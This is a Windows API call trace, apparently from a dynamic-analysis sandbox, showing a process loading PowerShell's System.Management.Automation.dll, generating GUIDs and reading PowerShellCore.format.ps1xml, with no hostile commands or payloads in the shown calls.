	[0509.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0509.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0509.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0509.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.115] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xd47e4489, Data2=0x31a9, Data3=0x4289, Data4=([0]=0xa4, [1]=0x3c, [2]=0x75, [3]=0x8f, [4]=0xcd, [5]=0x54, [6]=0xb1, [7]=0x7a))) returned 0x0
	[0510.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.119] VirtualQuery (in: lpAddress=0x14b300, lpBuffer=0x14c1c0, dwLength=0x30 | out: lpBuffer=0x14c1c0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0510.120] VirtualQuery (in: lpAddress=0x14b390, lpBuffer=0x14c250, dwLength=0x30 | out: lpBuffer=0x14c250*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0510.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.121] VirtualQuery (in: lpAddress=0x14bb10, lpBuffer=0x14c9d0, dwLength=0x30 | out: lpBuffer=0x14c9d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0510.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.123] VirtualQuery (in: lpAddress=0x14bb10, lpBuffer=0x14c9d0, dwLength=0x30 | out: lpBuffer=0x14c9d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0510.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.125] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x2db8ea47, Data2=0x2bb1, Data3=0x4128, Data4=([0]=0x9f, [1]=0x77, [2]=0xeb, [3]=0xa4, [4]=0x9e, [5]=0x7d, [6]=0xe1, [7]=0x8b))) returned 0x0
	[0510.127] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xd47c8298, Data2=0x66e2, Data3=0x4fc2, Data4=([0]=0xab, [1]=0xd4, [2]=0xf2, [3]=0xa3, [4]=0xf7, [5]=0x73, [6]=0x5d, [7]=0xc5))) returned 0x0
	[0510.127] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xc286ddbd, Data2=0x471b, Data3=0x44b3, Data4=([0]=0x8a, [1]=0x44, [2]=0x81, [3]=0x81, [4]=0x5a, [5]=0x9, [6]=0x51, [7]=0x99))) returned 0x0
	[0510.137] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x282370eb, Data2=0xacd1, Data3=0x41d9, Data4=([0]=0xb5, [1]=0x42, [2]=0xa5, [3]=0x8, [4]=0xe5, [5]=0x41, [6]=0xc8, [7]=0x8c))) returned 0x0
	[0510.138] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x3459337f, Data2=0x6922, Data3=0x4793, Data4=([0]=0xa4, [1]=0x48, [2]=0x5a, [3]=0x42, [4]=0x5d, [5]=0x5e, [6]=0xbe, [7]=0xfc))) returned 0x0
	[0510.138] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xb2d57819, Data2=0xf99e, Data3=0x4bc9, Data4=([0]=0x8f, [1]=0xfc, [2]=0xb0, [3]=0x1b, [4]=0xb3, [5]=0x74, [6]=0xde, [7]=0x83))) returned 0x0
	[0510.138] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x4a6db172, Data2=0xa925, Data3=0x4769, Data4=([0]=0xbb, [1]=0x4b, [2]=0xa1, [3]=0x5d, [4]=0xc0, [5]=0x43, [6]=0xa0, [7]=0xe0))) returned 0x0
	[0510.138] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x411a7c2d, Data2=0x2728, Data3=0x4d9a, Data4=([0]=0xae, [1]=0xfc, [2]=0x8b, [3]=0x82, [4]=0x52, [5]=0xa6, [6]=0xc, [7]=0x8c))) returned 0x0
	[0510.138] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x6abe0fc, Data2=0xf07e, Data3=0x4bc0, Data4=([0]=0xa0, [1]=0x77, [2]=0x1a, [3]=0xbf, [4]=0xe, [5]=0x8, [6]=0x57, [7]=0xc1))) returned 0x0
	[0510.138] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x6eedc06e, Data2=0xa568, Data3=0x4f4f, Data4=([0]=0x98, [1]=0x2a, [2]=0x62, [3]=0xa4, [4]=0xa7, [5]=0x89, [6]=0xb0, [7]=0x25))) returned 0x0
	[0510.139] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x686ce836, Data2=0x1b82, Data3=0x4592, Data4=([0]=0xae, [1]=0x62, [2]=0x76, [3]=0xa9, [4]=0x1, [5]=0x6f, [6]=0x3, [7]=0x21))) returned 0x0
	[0510.139] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x6423c5a8, Data2=0xed7d, Data3=0x4386, Data4=([0]=0x98, [1]=0xdb, [2]=0xcd, [3]=0xc, [4]=0xaf, [5]=0xf6, [6]=0x5e, [7]=0x7e))) returned 0x0
	[0510.140] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x4c465289, Data2=0xd99f, Data3=0x43a9, Data4=([0]=0xa4, [1]=0xd9, [2]=0xeb, [3]=0x43, [4]=0xc, [5]=0xe8, [6]=0x21, [7]=0x79))) returned 0x0
	[0510.141] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xe3d692e5, Data2=0xf608, Data3=0x433f, Data4=([0]=0x96, [1]=0x7f, [2]=0x6e, [3]=0xa8, [4]=0x99, [5]=0xf7, [6]=0x2c, [7]=0xc8))) returned 0x0
	[0510.142] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xa3ba2885, Data2=0xa049, Data3=0x4f9d, Data4=([0]=0x9e, [1]=0xd3, [2]=0xf4, [3]=0xc3, [4]=0x14, [5]=0x91, [6]=0x33, [7]=0xe))) returned 0x0
	[0510.142] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xc193585a, Data2=0xef9b, Data3=0x4949, Data4=([0]=0xaf, [1]=0x33, [2]=0x3, [3]=0x8a, [4]=0x79, [5]=0x21, [6]=0xf, [7]=0x9b))) returned 0x0
	[0510.142] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x72be463a, Data2=0x5d9b, Data3=0x4a2f, Data4=([0]=0x93, [1]=0xa1, [2]=0xc9, [3]=0x19, [4]=0x1b, [5]=0x33, [6]=0x27, [7]=0xf9))) returned 0x0
	[0510.142] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x4cb4af7b, Data2=0x9a9a, Data3=0x45b0, Data4=([0]=0xbf, [1]=0x5, [2]=0xf5, [3]=0x7c, [4]=0x85, [5]=0x43, [6]=0x29, [7]=0x33))) returned 0x0
	[0510.142] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x12d5a145, Data2=0x62fc, Data3=0x4c58, Data4=([0]=0x85, [1]=0x47, [2]=0x2e, [3]=0x4d, [4]=0xc4, [5]=0x82, [6]=0xa2, [7]=0x13))) returned 0x0
	[0510.143] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x77c152e3, Data2=0x4858, Data3=0x48d1, Data4=([0]=0xbc, [1]=0xe9, [2]=0x9, [3]=0x47, [4]=0xf, [5]=0x5d, [6]=0xb9, [7]=0x33))) returned 0x0
	[0510.143] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xf7ed4a3c, Data2=0x5621, Data3=0x44a8, Data4=([0]=0xac, [1]=0x29, [2]=0xe7, [3]=0x77, [4]=0xb2, [5]=0x86, [6]=0xb0, [7]=0x49))) returned 0x0
	[0510.143] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x98ff0fe4, Data2=0xb0dd, Data3=0x47f5, Data4=([0]=0xa0, [1]=0x5a, [2]=0xc6, [3]=0x78, [4]=0x6b, [5]=0xbc, [6]=0x25, [7]=0xb3))) returned 0x0
	[0510.143] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0510.143] GetFileType (hFile=0x320) returned 0x1
	[0510.143] SetErrorMode (uMode=0x1) returned 0x1
	[0510.143] GetFileType (hFile=0x320) returned 0x1
	[0510.143] ReadFile (in: hFile=0x320, lpBuffer=0x2f7db28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7db28*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0510.144] ReadFile (in: hFile=0x320, lpBuffer=0x2f7db28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7db28*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0510.144] ReadFile (in: hFile=0x320, lpBuffer=0x2f7db28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7db28*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0510.145] ReadFile (in: hFile=0x320, lpBuffer=0x2f7db28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7db28*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0510.145] ReadFile (in: hFile=0x320, lpBuffer=0x2f7db28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7db28*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0510.145] ReadFile (in: hFile=0x320, lpBuffer=0x2f7db28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7db28*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0510.145] ReadFile (in: hFile=0x320, lpBuffer=0x2f7db28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7db28*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0510.145] ReadFile (in: hFile=0x320, lpBuffer=0x2f7db28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7db28*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0510.146] ReadFile (in: hFile=0x320, lpBuffer=0x2f7db28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7db28*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0510.146] ReadFile (in: hFile=0x320, lpBuffer=0x2f7db28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7db28*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0510.146] ReadFile (in: hFile=0x320, lpBuffer=0x2f7db28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7db28*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0510.147] ReadFile (in: hFile=0x320, lpBuffer=0x2f7db28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7db28*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0510.147] ReadFile (in: hFile=0x320, lpBuffer=0x2f7db28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7db28*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0510.147] ReadFile (in: hFile=0x320, lpBuffer=0x2f7db28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7db28*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
